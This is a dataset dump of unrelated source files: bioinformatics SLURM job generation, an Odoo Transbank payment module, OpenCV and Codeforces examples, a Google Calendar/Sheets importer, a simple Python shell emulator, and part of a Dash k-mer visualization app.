combdict[lib].append(snp)\nos.system('echo there are %s keys in combdict' % str(len(combdict.keys())))\nfor k in combdict.keys():\n os.system('echo %s' % k)\n\n# write the sh files\nshfiles = []\nfor lib in combdict.keys():\n if len(combdict[lib]) in [500,1000]:\n catout = op.join(catdir,\"%s_concatenated_snps.vcf.gz\" % lib)\n filtout = op.join(filtdir,\"%s_filtered_concatenated_snps.vcf.gz\" % lib)\n firstlib = lib.split(\"---\")[0]\n ref = poolref[firstlib]\n # I should have made scaffols be zfill(4) not zfill(3)\n files = \" \".join([snp for snp in sorted(combdict[lib]) if '1000' not in snp])\n # (bcftools needs the input files to be sorted)\n files = files + ' %s ' % [snp for snp in combdict[lib] if '1000' in snp][0] \n text = '''#!/bin/bash\n#SBATCH --time=02:59:59\n#SBATCH --mem=15000M\n#SBATCH --nodes=1\n#SBATCH --ntasks=32\n#SBATCH --cpus-per-task=1\n#SBATCH --job-name=%(lib)s-concat\n#SBATCH --output=%(lib)s-concat_%%j.out \n#SBATCH --mail-user=lindb@vcu.edu\n#SBATCH --mail-type=FAIL\n\nmodule load bcftools/1.9\n\nbcftools concat %(files)s -O z -o %(catout)s --threads 32\n\nmodule load gatk/4.0.8.1\n\ngatk IndexFeatureFile -F %(catout)s\n\ngatk VariantFiltration -R %(ref)s -V %(catout)s -O %(filtout)s --filter-expression \"QD < 2.0 || FS > 60.0 || MQ < 40.0 || MQRankSum < -12.5\" --filter-name \"coadaptree_filter\"\n\n''' % locals()\n file = op.join(shdir,\"%s-concat.sh\" % lib)\n if not op.exists(filtout): # so I can run this when files begin to finish from 03a and 03b\n if not op.exists(filtout.replace(\".gz\",\".gz.tbi\")):\n with open(file,'w') as o:\n o.write(\"%s\" % text)\n shfiles.append(file)\n\n# os.chdir(shdir)\n# for sh in shfiles:\n# os.system('echo %s' % sh)\n# os.system('sbatch %s' % sh)\n[print(sh) for sh in shfiles]\n 
\n","sub_path":"pipeline/04_filter_concat_scaffolds.py","file_name":"04_filter_concat_scaffolds.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"292775821","text":"import logging\nimport pprint\nfrom base64 import b64decode\nfrom urllib.parse import urljoin\n\nfrom tbk.services import WebpayService\nfrom tbk.commerce import Commerce\nfrom tbk import environments\nfrom odoo import api, fields, models, _\nfrom odoo.tools import float_round\nfrom odoo.tools.float_utils import float_repr\nfrom odoo.http import request\n\nfrom odoo.addons.payment.models.payment_acquirer import ValidationError\nfrom odoo.addons.payment_transbank.controllers.main import TransbankController\nfrom .transbank_data import RESPONSE_CODE, PAYMENT_TYPE_CODE\n\n_logger = logging.getLogger(__name__)\n\n\nclass PaymentAcquirerTransbank(models.Model):\n _inherit = 'payment.acquirer'\n\n provider = fields.Selection(\n selection_add=[('transbank', 'Transbank')], ondelete={'transbank': 'cascade'})\n # Elementos para generar el certificado\n transbank_commerce_id = fields.Char(\n string='ID de comercio',\n default=\"597020000541\",\n required_if_provider='transbank',\n help=\"Es requerido para que funcione el addons y generar el certificado autofirmado\")\n transbank_city = fields.Char(string=\"Ciudad\", help=\"Debe ser en mayúscula y sin tílde\")\n transbank_cert_file = fields.Binary(string=\"Cert File\")\n transbank_key_file = fields.Binary(string=\"Key File\")\n transbank_tbk_cert_file = fields.Binary(string=\"Transbank Cert File\")\n transbank_cert_file_name = fields.Char(string=\"Cert File name\")\n transbank_key_file_name = fields.Char(string=\"Key File name\")\n transbank_tbk_cert_file_name = fields.Char(string=\"Transbank Cert File name\")\n\n def _get_feature_support(self):\n res = super(PaymentAcquirerTransbank, self)._get_feature_support()\n # res['fees'].append('transbank')\n 
res['authorize'].append('transbank')\n # res['tokenize'].append('transbank')\n return res\n\n def transbank_get_form_action_url(self):\n return TransbankController._init_url\n\n def transbank_form_generate_values(self, values):\n amount = float_repr(float_round(values['amount'], 2), 0)\n currency = values['currency'] and values['currency'].name or ''\n buyorder = values['reference']\n acquirer_id = self.id\n\n transbank_tx_values = dict(values)\n temp_transbank_tx_values = {\n 'ACQUIRER_ID': acquirer_id,\n 'AMOUNT': amount,\n 'CURRENCY': currency,\n 'BUYORDER': buyorder\n }\n transbank_tx_values.update(temp_transbank_tx_values)\n return transbank_tx_values\n\n def _get_webpay_client(self):\n key_data = b64decode(self.transbank_key_file)\n cert_data = b64decode(self.transbank_cert_file)\n tbk_cert_data = b64decode(self.transbank_tbk_cert_file)\n transbank_enviroment = environments.DEVELOPMENT\n if self.state == 'cert':\n transbank_enviroment = environments.CERTIFICATION\n elif self.state == 'enabled':\n transbank_enviroment = environments.PRODUCTION\n commerce = Commerce(self.transbank_commerce_id, key_data, cert_data, tbk_cert_data, transbank_enviroment)\n webpay = WebpayService(commerce)\n return webpay\n\n def initTransaction(self, post):\n base_url = self.get_base_url()\n return_url = urljoin(base_url, TransbankController._result_url)\n final_url = urljoin(base_url, TransbankController._end_url)\n webpay = self._get_webpay_client()\n transaction = webpay.init_transaction(post['AMOUNT'], post['BUYORDER'], return_url, final_url)\n return transaction\n\n\nclass PaymentTransaction(models.Model):\n _inherit = 'payment.transaction'\n\n transbank_auth_transaction = fields.Char(\"Código autorización de transacción\", readonly=True, copy=False)\n transbank_payment_type = fields.Char(\"Tipo de pago\", readonly=True, copy=False)\n transbank_fee_type = fields.Char(\"Numero de cuotas\", readonly=True, copy=False)\n transbank_amount_fee = fields.Char(\"Valor de cuota\", 
readonly=True, copy=False)\n transbank_last_digits = fields.Char(\"Últimos dígitos de la tarjeta\", readonly=True, copy=False)\n transbank_commerce_id = fields.Char(string='ID de comercio')\n\n @api.model\n def _transbank_form_get_tx_from_data(self, data):\n reference = data.get('token_ws') or data.get('TBK_TOKEN')\n if reference:\n tx = self.search([('acquirer_reference', '=', reference)])\n elif data.get('transbank_transaction_id'):\n tx = self.browse(int(data.get('transbank_transaction_id')))\n elif data.get('BUYORDER'):\n tx = self.search([('reference', '=', data.get('BUYORDER'))])\n elif (request.session.get('sale_last_order_id') and request.session.get('__website_sale_last_tx_id')):\n tx = self.browse(request.session.get('__website_sale_last_tx_id'))\n if not tx or len(tx) > 1:\n error_msg = _('received data for reference %s') % (pprint.pformat(reference))\n if not tx:\n error_msg += _('; no order found')\n else:\n error_msg += _('; multiple order found')\n _logger.info(error_msg)\n raise ValidationError(error_msg)\n return tx\n\n def _transbank_form_get_invalid_parameters(self, data):\n invalid_parameters = []\n reference = data.get('token_ws') or data.get('TBK_TOKEN')\n if self.acquirer_reference and reference != self.acquirer_reference:\n invalid_parameters.append(('Reference code', reference, self.acquirer_reference))\n return invalid_parameters\n\n @api.model\n def _transbank_process_message_error(self, data):\n # cuando se anula en webpay se devuelve esta variable\n if data.get('TBK_TOKEN'):\n message_data = {\n 'header': 'Vemos que has desistido de tu compra.',\n 'body': 'Tal vez, estos no eran los productos que buscabas. Te invitamos a seguir mirando nuestro grandioso catálogo de productos',\n 'detail': ''\n }\n elif data.get('responseCode'):\n message_data = {\n 'header': 'Oops!. 
La transacción no se ha podido terminar.',\n 'body': '',\n 'detail': RESPONSE_CODE[data.get('responseCode')]\n\n }\n else:\n message_data = {\n 'header': 'Lo sentimos mucho.',\n 'body': 'Tenemos un inconveniente para realizar su compra. Solicitamos intentar nuevamente más tarde, gracias.',\n 'detail': 'Solicitamos comunicarce con nosotros y reportar el problema, gracias.'\n }\n return message_data\n\n def _transbank_form_validate(self, data):\n # cuando se anula en webpay se devuelve esta variable\n if data.get('TBK_TOKEN'):\n self._set_transaction_cancel()\n return False\n if not data.get('token_ws'):\n self._set_transaction_error(\"No se devolvio el token de la transaccion\")\n return False\n webpay_result = data.get('webpay_result') or {}\n if isinstance(webpay_result.get('detailOutput', []), list):\n detailOutput = webpay_result['detailOutput'][0]\n else:\n detailOutput = webpay_result['detailOutput']\n responseCode = detailOutput.get('responseCode', -1)\n _logger.info(pprint.pformat(webpay_result))\n transaction_vals = {\n 'state_message': str(webpay_result),\n }\n if RESPONSE_CODE.get(responseCode):\n transaction_vals['state_message'] = RESPONSE_CODE.get(responseCode)\n if responseCode == 0:\n # si tiene cuotas\n shares_amount = 0\n if 'sharesAmount' in detailOutput:\n shares_amount = detailOutput['sharesAmount']\n transaction_vals.update({\n 'transbank_auth_transaction': detailOutput['authorizationCode'],\n 'transbank_payment_type': PAYMENT_TYPE_CODE[detailOutput['paymentTypeCode']],\n 'transbank_fee_type': detailOutput['sharesNumber'],\n 'transbank_amount_fee': shares_amount,\n 'transbank_last_digits': webpay_result.get('cardDetail', {}).get('cardNumber'),\n 'transbank_commerce_id': detailOutput['commerceCode'],\n })\n self.write(transaction_vals)\n self._set_transaction_done()\n return True\n else:\n self.write(transaction_vals)\n self._set_transaction_cancel()\n return False\n\n def action_capture(self):\n transaction_transbank = self.filtered(lambda x: 
x.transbank_auth_transaction)\n for transaction in transaction_transbank:\n if transaction.state != 'done':\n transaction.sudo()._set_transaction_done()\n return super(PaymentTransaction, self - transaction_transbank).action_capture()\n\n def render_sale_button(self, order, submit_txt=None, render_values=None):\n if not render_values is None:\n render_values['transbank_order_id'] = order.id\n render_values['transbank_transaction_id'] = self.id\n return super(PaymentTransaction, self).render_sale_button(order, submit_txt=submit_txt,\n render_values=render_values)\n","sub_path":"payment_transbank/models/payment_acquirer.py","file_name":"payment_acquirer.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11729083","text":"\"\"\"\n@file hough_lines.py\n@brief This program demonstrates line finding with the Hough transform\n\"\"\"\n\n# Source url: https://docs.opencv.org/4.2.0/d9/db0/tutorial_hough_lines.html\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger()\n\nimport sys\nimport math\nimport cv2 as cv\nimport numpy as np\n\ndef main():\n filename = 'sudoku.png'\n src = cv.imread(filename, cv.IMREAD_GRAYSCALE)\n if src is None:\n raise Exception(\"Failed to load source file\")\n\n dst = cv.Canny(src, 50, 200, None, 3)\n cdst = cv.cvtColor(dst, cv.COLOR_GRAY2BGR)\n lines = cv.HoughLines(dst, 1, np.pi / 180, 150, None, 0, 0)\n\n if lines is not None:\n for i in range(0, len(lines)):\n rho = lines[i][0][0]\n theta = lines[i][0][1]\n a = math.cos(theta)\n b = math.sin(theta)\n x0 = a * rho\n y0 = b * rho\n pt1 = (int(x0 + 1000*(-b)), int(y0 + 1000*(a)))\n pt2 = (int(x0 - 1000*(-b)), int(y0 - 1000*(a)))\n cv.line(cdst, pt1, pt2, (0,0,255), 3, cv.LINE_AA)\n\n cv.imshow(\"Origin image\", src)\n cv.imshow(\"Detected Lines (in red) - Standard Hough Line Transform\", cdst)\n cv.waitKey()\n\nif __name__ == \"__main__\":\n try:\n main()\n except 
Exception as e:\n log.exception(e)","sub_path":"py_opencv/py_hough_line.py","file_name":"py_hough_line.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542912353","text":"# http://codeforces.com/problemset/problem/540/C\nfrom queue import Queue\nDIR = [(0, -1), (-1, 0), (0, 1), (1, 0)]\ndef bfs(r1, c1, r2, c2, cave):\n q = Queue()\n q.put((r1, c1))\n while q.empty() == False:\n x, y = q.get()\n for dx, dy in DIR:\n new_x = x + dx\n new_y = y + dy\n if new_x < len(cave) and new_y < len(cave[0]) \\\n and new_x >= 0 and new_y >= 0:\n if cave[new_x][new_y] == 'X':\n if new_x == r2 and new_y == c2:\n return 'YES'\n else:\n continue\n else:\n q.put((new_x, new_y))\n cave[new_x][new_y] = 'X'\n return 'NO'\n\nn, m = map(int, input().split())\ncave = [None] * n\nfor i in range(n):\n cave[i] = list(input())\n \nr1, c1 = map(int, input().split())\nr2, c2 = map(int, input().split())\nprint (bfs(r1 - 1, c1 - 1, r2 - 1, c2 - 1, cave))\n\n","sub_path":"codeforces/540C.py","file_name":"540C.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"255541669","text":"#Sources:\n#https://www.geeksforgeeks.org/reading-excel-file-using-python/\n#https://developers.google.com/calendar/v3/reference\n\nfrom __future__ import print_function\nimport os.path\nfrom os import path\nimport tkinter as tk\nfrom tkinter.filedialog import askopenfilename\nimport tkinter.messagebox\nimport datetime\nimport pickle\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nimport xlrd \n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/calendar.events', 'https://www.googleapis.com/auth/spreadsheets']\n\n#Root window for TK\nroot = tk.Tk()\nroot.withdraw()\n\n# Give 
the location of the file \nloc = askopenfilename(title = \"Select EXCEL file\",filetypes = ((\"xlsx files\",\"*.xlsx\"), (\"all files\",\"*.*\")) )\n \n#This part is about parsing the Excel file into the variables needed to store the event info\n# To open Workbook \nwb = xlrd.open_workbook(loc) \nsheet = wb.sheet_by_index(0) \n\n#Get Title/Summary\nsummary_in = (sheet.cell_value(1,0))\n\n#Get Location\nloc_in = (sheet.cell_value(1,1))\n\n#Get Desc\ndesc_in = (sheet.cell_value(1,2))\n\n#Get Start Time and Date\nstarttime_in = (sheet.cell_value(1,3))\nstartdate_in = (sheet.cell_value(1,4))\nstart_dts = startdate_in + ' ' + starttime_in\n\n#Get End Time and Date\nendtime_in = (sheet.cell_value(1,5))\nenddate_in = (sheet.cell_value(1,6))\nend_dts = enddate_in + ' ' + endtime_in\n\n#Date & timestamp stuff is janky because the JSON object \"event\" wants RCF formatted time,\n#whereas the Excel file could have any kind of time input, so using strptime with concacted strings is probably the most\n#flexible approach for now\ndto_start = datetime.datetime.strptime(start_dts, '%m-%d-%Y %I:%M %p')\ndto_end = datetime.datetime.strptime(end_dts, '%m-%d-%Y %I:%M %p')\n\n#Get Attendees // currently not implemented\n#List of attendees is a \"list of dicts\" which is the input the JSON object \"event\" wants\n#attendee = (sheet.cell_value(7,1))\nattendees = [\"lpage@example.com\", \"ddage@example.com\"]\nlist_of_attendees = [\n {'email': attendees[0] },\n {'email': attendees[1] }\n ]\n#Is a WIP\n\ndef main():\n # A quick check to see if the token already exists.\n if (not (path.exists(\"token.pickle\"))):\n tkinter.messagebox.showinfo( \"Excel to Google Event\", \"You will be prompted to login & give permission to Google Cal\")\n \n #This is taken directly from the Google API Quickstart guide\n \"\"\"Shows basic usage of the Google Calendar API.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the 
authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n \n #Here the service is built with credentials & we can move on to creating the event\n service = build('calendar', 'v3', credentials=creds)\n\n #Adding on sheets service\n sheets_service = build('sheets', 'v4', credentials=creds)\n\n #Spreadsheet ID\n SPREADSHEET_ID = '15-sqH2xXxN2Oq-VPR-Ei7u9aUIqImjEMFieo32gd1BQ'\n SCHEDULE_SHEET_ID = '1461379716' # 2-Schedule Recording-Instructional Day\n INSTRUCTORS_SHEET_ID = '1867685112' # 1-Approve Courses-Instructors-DropDown Menus\n SAMPLE_RANGE_NAME = '2-Schedule Recording-Instructional Day!A57:Y192'\n\n # Call the Sheets API\n sheet = sheets_service.spreadsheets()\n result = sheet.values().get(spreadsheetId=SPREADSHEET_ID,\n range=SAMPLE_RANGE_NAME).execute()\n values = result.get('values', [])\n print (len(values))\n\n if not values:\n print('No data found.')\n else:\n for row in values:\n print (len(row))\n # Print columns A and E, which correspond to indices 0 and 4.\n print(row[0] + ' ' + row[1] + ' ' + row[4] + ' ' + row[5] + ' ' + row[6] + ' ' + row[7] + ' ' + row[8] + ' ' + row[9] + ' ' + row[10] + ' ' + row[11] + ' ' + row[12] )\n\n #The actual JSON style event object, time zone is static just because not really necessary \n event = {\n 'summary': summary_in,\n 'location': loc_in,\n 'description': desc_in,\n 'start': {\n 'dateTime': dto_start.isoformat(\"T\"),\n 'timeZone': 'US/Eastern',\n },\n 'end': {\n 'dateTime': 
dto_end.isoformat(\"T\"),\n 'timeZone': 'US/Eastern',\n },\n # 'recurrence': [\n # 'RRULE:FREQ=DAILY;COUNT=2'\n # ],\n 'attendees': list_of_attendees,\n 'reminders': {\n 'useDefault': False,\n 'overrides': [\n {'method': 'email', 'minutes': 24 * 60},\n {'method': 'popup', 'minutes': 10},\n ],\n },\n }\n \n #Uses the service to insert the event\n event = service.events().insert(calendarId='primary', body=event, sendUpdates='all').execute()\n #could possibly make a popup with the HTML link as output\n print ('Event created: %s' % (event.get('htmlLink')))\n\nif __name__ == '__main__':\n main()\n","sub_path":"old (ignore)/runner - Copy.py","file_name":"runner - Copy.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"70711472","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_post_public'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),\n ('category', models.CharField(max_length=255, verbose_name='Категория')),\n ],\n ),\n migrations.AlterField(\n model_name='post',\n name='author',\n field=models.CharField(max_length=255, default='admin', verbose_name='Автор'),\n ),\n migrations.AlterField(\n model_name='post',\n name='category',\n field=models.CharField(max_length=255, verbose_name='Категория'),\n ),\n migrations.AlterField(\n model_name='post',\n name='content',\n field=models.TextField(max_length=10000, verbose_name='Текст'),\n ),\n migrations.AlterField(\n model_name='post',\n name='title',\n field=models.CharField(max_length=255, verbose_name='Название'),\n ),\n 
]\n","sub_path":"blog/migrations/0003_auto_20151105_0036.py","file_name":"0003_auto_20151105_0036.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"445881177","text":"#имя файла: Task 12.py\r\n#номер версии: 1.0\r\n#автор и его учебная группа: Александровский А.П., ЭУ-142\r\n#дата создания: 22.05.2019\r\n#связанные файлы: пакет numpy\r\n#версия Python: 3.6\r\n#ОПИСАНИЕ: Создать прямоугольную матрицу A, имеющую N строк и M столбцов со\r\n #случайными элементами. Разделить элементы каждой строки на элемент\r\n #этой строки с наибольшим значением.\r\n\r\n\r\n\r\n\r\n# Подключение библиотеки Numpy и Random\r\nimport numpy as np\r\nimport random\r\n\r\n# Число строк и столбцов\r\nN = random.randint(2, 10)\r\nM = random.randint(1, 10)\r\n\r\n# Так как матрица должна быть прямоугольной, то N не может быть равно M\r\nwhile N == M:\r\n N = random.randint(1, 10)\r\n M = random.randint(1, 10)\r\n\r\n# Создание матрицы\r\nA = np.random.randint(0, 10, (N, M)).astype(np.float64)\r\nprint(str(A) + \"\\n\")\r\n\r\n# Нахождение наибольшее значение для каждой строки матрицы\r\nMax = A.max(axis=1)\r\nMax = np.array(Max)[: , np.newaxis]\r\n\r\n# Деление элеменотов\r\nA = A / Max\r\nprint(\"\\nНовая матрица: \\n\" + str(A))","sub_path":"2 Часть курсовой работы/Task 12.py","file_name":"Task 12.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399299300","text":"import os\nimport sys\nimport numpy\nimport shutil\nfrom task9 import *\nfrom pathlib import Path\n\ndef main(args):\n cwd = Directory(os.getcwd())\n while True:\n cmdtokens = input('{path}$ '.format(path=cwd.path)).split()\n if not cmdtokens:\n continue\n cmd = cmdtokens[0]\n cmdargs = cmdtokens[1:]\n if cmd == 'ls':\n print()\n path = cwd.path if not cmdargs else cmdargs[0]\n directory = cwd.getsubdirectory(path)\n for item in 
directory.items():\n if item.isfile():\n print('{name}\\tFILE\\t{size}'.format(\n name=item.getname(), size=len(item)))\n else:\n print('{name}\\tDIR'.format(name=item.getname()))\n print()\n elif cmd == 'cd':\n new_path = ''.join(cmdargs)\n if os.path.isdir(new_path):\n path = new_path\n if '..' in new_path :\n for count in range(new_path.count('..')):\n cwd = Directory(os.path.split(cwd.get_path_name())[0])\n os.chdir(cwd.get_path_name())\n else:\n cwd = Directory(os.path.join(cwd.get_path_name(), path))\n os.chdir(cwd.get_path_name())\n elif not cmdargs or cmdargs == ['~/']:\n path = str(Path.home())\n cwd = Directory(path)\n os.chdir(cwd.get_path_name())\n else:\n print('Error! There is no such directory!')\n elif cmd == 'cat':\n new_path = ''.join(cmdargs)\n if os.path.isfile(new_path):\n with open(new_path, 'r') as file:\n for line in file:\n print(line.rstrip())\n elif cmd == 'head':\n number_of_rows = 10\n new_path = ''.join(cmdargs)\n if os.path.isfile(new_path):\n with open(new_path, 'r') as file:\n while number_of_rows != 0:\n print(file.readline().rstrip())\n number_of_rows -= 1\n elif cmd == 'tail':\n number_of_rows = 10\n new_path = ''.join(cmdargs)\n if os.path.isfile(new_path):\n with open(new_path, 'r') as file:\n my_lines = file.readlines()\n for line in my_lines[-number_of_rows:]:\n print(line.rstrip())\n elif cmd == 'pwd':\n print(os.getcwd())\n elif cmd == 'touch':\n new_path = ''.join(cmdargs)\n File(new_path).create() \n elif cmd == 'find':\n find_file = ''.join(cmdargs)\n all_paths = list(map(lambda x: x.get_path_name(), Directory(os.getcwd()).filesrecursive()))\n for path in all_paths:\n if find_file in os.path.split(path)[1]:\n print(path)\n elif cmd == 'clear':\n print('\\n' * 150)\n elif cmd == 'mv':\n old_name = cmdargs[0]\n new_name = cmdargs[1]\n if os.path.exists(old_name) and os.path.exists(os.path.join(os.getcwd(), new_name)) == False:\n os.rename(old_name, new_name)\n elif os.path.isfile(old_name) and os.path.isdir(new_name):\n 
shutil.move(old_name, new_name)\n else:\n print(\"Error: wrong input\")\n elif cmd == 'cp':\n old_name = cmdargs[0]\n new_name = cmdargs[1]\n if os.path.isfile(old_name) and os.path.isdir(new_name):\n shutil.copy(old_name, new_name)\n else:\n print(\"Error: wrong input\")\n elif cmd == 'rm':\n item = ''.join(cmdargs)\n if FSItem(item).isfile():\n os.remove(item)\n elif FSItem(item).isdirectory():\n shutil.rmtree(item)\n elif cmd == 'exit':\n print(\"Bye bye!\")\n break\n","sub_path":"first_session/taskA.py","file_name":"taskA.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"265789065","text":"import dash\nimport dash_core_components as dcc\nimport dash_table\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport os\nfrom dash.exceptions import PreventUpdate\nimport dash_bio as dashbio\n\nfrom src.processing import Processing\nfrom src.dashView import initializeData\n\n# files, which are processed\n# read-only\nfile_list = None\nstruct_data = None\n\n\n# starts dash\n# file_list: input data\n# sec_struct_data: input structural data\n# port: port\ndef startDash(files, port, sec_struct_data):\n global file_list\n global struct_data\n file_list = files\n struct_data = sec_struct_data\n app.run_server(debug=False, host='0.0.0.0', port=port)\n\n\n# calculates slider ranges\n# peak-boolean sets first value to 'none' (for peak-slider)\ndef markSliderRange(min_val, max_val, peak):\n mark = {}\n if peak:\n min_val += 1\n mark[0] = 'none'\n for i in range(min_val, max_val + 1):\n mark[i] = str(i)\n return mark\n\n\n# range() function for floats\n# start: start-value which is head of list\n# step: steps between two values\n# run: number of loop runs\ndef float_range(start, step, run):\n for_list = [start]\n for i in range(1, run):\n next_step = start + step * i\n for_list.append(next_step)\n return for_list\n\n\n# checks if 
custom normalization rates sum up to one\n# parameters (e.g. ee,ss,etc. ..): rate for 2-mer\ndef check_sum(ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs):\n custom_rates = [ee, ss, ii, mm, bb, si, i_s, sm, ms, es, se, hh, hs, sh, sb, bs]\n k_mer_sum = round(sum(custom_rates), 1)\n check_passed = bool(k_mer_sum == 1)\n\n return check_passed\n\n\n# ------------------------------------------- Dash-Layout --------------------------------------------------------------\n\napp = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\n\napp.title = \"k-Mer Dash\"\n\napp.layout = dbc.Container([\n # ------------------------------------------ Store -----------------------------------------------------------------\n dbc.Spinner(children=[dcc.Store(id='memory', storage_type='memory')],\n color=\"primary\", fullscreen=True),\n\n # -------------------------------------------------------------------------------------------------------------------\n dbc.Card([\n dbc.Row([\n dbc.Col(\n dbc.CardBody([\n html.H3(\"Menu\"),\n html.Br(),\n # ------------------------------------- Select File1 And File 2 ------------------------------------\n html.H6(\"Selected files:\", id=\"sel_files_header\"),\n dbc.Select(\n id=\"file1\",\n options=[],\n value=\"0\"),\n dbc.Select(\n id=\"file2\",\n options=[],\n value=\"1\"),\n dbc.Tooltip(\n \"Files containing DNA nucleotide-sequences used for k-mer visualization\",\n target=\"sel_files_header\"\n ),\n html.Br(),\n html.Br(),\n # ------------------------------------- Select Structure Files -------------------------------------\n html.H6(\"Selected structure files:\", id=\"struc_files_header\"),\n dbc.Select(\n id=\"file3\",\n options=[{\"label\": \"-\", \"value\": \"0\"}],\n value=\"0\"),\n dbc.Select(\n id=\"file4\",\n options=[{\"label\": \"-\", \"value\": \"0\"}],\n value=\"1\"),\n dbc.Tooltip(\n \"Files containing element-strings used for RNA structure heatmaps(s)\",\n target=\"struc_files_header\"\n ),\n html.Br(),\n 
html.Br(),\n # ------------------------------------------- K ----------------------------------------------------\n html.H6(\"K-mer length:\", id=\"k_header\"),\n dcc.Slider(\n id='k',\n min=0,\n max=10,\n step=1,\n value=3,\n marks=markSliderRange(0, 10, False)\n ),\n dbc.Tooltip(\n \"Length of visualized substrings (k-mer)\",\n target=\"k_header\"\n ),\n html.Br(),\n # ----------------------------------------- Peak ---------------------------------------------------\n html.H6(\"Peak-position:\", id=\"peak_header\"),\n dcc.Slider(\n id='peak',\n min=1,\n max=10,\n step=1,\n value=0,\n marks=markSliderRange(0, 10, True)\n ),\n dbc.Tooltip(\n \"Highlighted position in sequence (e.g. assumed binding position \"\n \"of protein in given sequences)\",\n target=\"peak_header\"\n ),\n html.Br(),\n # ------------------------------------------ top ---------------------------------------------------\n html.H6(\"Top-values:\", id=\"top_header\"),\n dbc.Select(\n id='top',\n options=[\n {'label': '10', 'value': '0'},\n {'label': '20', 'value': '1'},\n {'label': '50', 'value': '2'},\n {'label': '100', 'value': '3'}\n ],\n value=\"0\"\n ),\n dbc.Tooltip(\n \"Number of highest k-mer occurrences\",\n target=\"top_header\"\n ),\n html.Br(),\n html.Br(),\n # -------------------------------- Highlighted Feature ---------------------------------------------\n html.H6(\"Highlighted feature:\", id=\"feature_header\"),\n dbc.Select(\n id=\"Feature\",\n options=[\n {\"label\": \"Frequency\", \"value\": \"1\"},\n {\"label\": \"T Occurrences\", \"value\": \"2\"},\n {\"label\": \"A Occurrences\", \"value\": \"3\"},\n {\"label\": \"C Occurrences\", \"value\": \"4\"},\n {\"label\": \"G Occurrences\", \"value\": \"5\"},\n ],\n value=\"1\"\n ),\n dbc.Tooltip(\n \"Highlighted/Colored property of PCAs\",\n target=\"feature_header\"\n ),\n html.Br(),\n html.Br(),\n # ------------------------------- Options structural data ------------------------------------------\n dbc.ButtonGroup(\n 
[dbc.Button(\"Extended options\", id=\"opt_btn_open\"),\n # dbc.Button(\"Export PDF\", id=\"ex_btn\",disabled=True)\n ],\n size=\"md\",\n className=\"mr-1\",\n ),\n dbc.Tooltip(\n \"Options for structural data visualization\",\n target=\"opt_btn_open\"\n ),\n dbc.Modal(\n [\n dbc.ModalHeader(\"Options for structural data visualization\"),\n dbc.ModalBody(children=[\n dcc.Checklist(\n id=\"sec_peak\",\n options=[{'label': 'show only peak positions', 'value': 'peaking'}],\n inputStyle={'margin-right': '3px'},\n ),\n dbc.Tooltip(\n \"Only show peak positions in RNA structure Heatmap(s)\",\n target=\"sec_peak\"\n ),\n html.Br(),\n html.Div(\"Normalization:\", id=\"norm_header\",\n style={'font-weight': 'bold', 'padding-bottom': '10px'}),\n html.Div(\"ERROR: sum of custom rates should be equal to 1\", id=\"error\",\n style={'font-weight': 'bold', 'color': 'red',\n 'padding-bottom': '10px'}, hidden=True),\n html.Div(\"ERROR: only numerical values between zero and one allowed\", id=\"error_type\",\n style={'font-weight': 'bold', 'color': 'red',\n 'padding-bottom': '10px'}, hidden=True),\n dcc.RadioItems(\n id=\"db\",\n options=[\n {'label': 'none', 'value': 'none'},\n {'label': 'use A.thaliana database', 'value': 'at_db'},\n {'label': 'use custom k-mer rates', 'value': 'custom_vals'}\n ],\n value='none',\n labelStyle={'display': 'block'},\n inputStyle={'margin-right': '3px'}\n ),\n dbc.Tooltip(\n \"Used data for normalization of structural data\",\n target=\"norm_header\"\n ),\n html.Div(id=\"norm_input\", children=[\n html.Table(children=[\n html.Tr(children=[\n html.Td(children=[\n html.Div(\"EE\"),\n dbc.Input(id=\"EE\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0)], ),\n html.Td(children=[\n html.Div(\"ES\"),\n dbc.Input(id=\"ES\", type=\"number\", style={'width': '100px'}, max=1,\n min=0, step=0.001, value=0)], ),\n html.Td(children=[\n html.Div(\"SS\"),\n dbc.Input(id=\"SS\", type=\"number\", style={'width': '100px'}, max=1,\n 
